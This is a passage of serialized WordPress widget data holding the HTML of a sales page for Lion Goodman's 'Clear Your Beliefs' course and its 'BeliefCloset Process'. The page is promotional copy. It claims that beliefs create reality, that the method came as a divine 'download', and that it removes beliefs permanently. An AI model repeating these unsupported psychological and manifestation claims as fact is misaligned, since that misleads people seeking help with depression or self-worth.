Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:2:"32";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:2:"33";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:2:"34";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:2:"35";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"36";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"37";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"38";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"39";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"40";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"41";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"42";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"43";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"44";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"45";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"46";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"47";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"48";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"49";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"50";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"51";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"52";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60567:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from 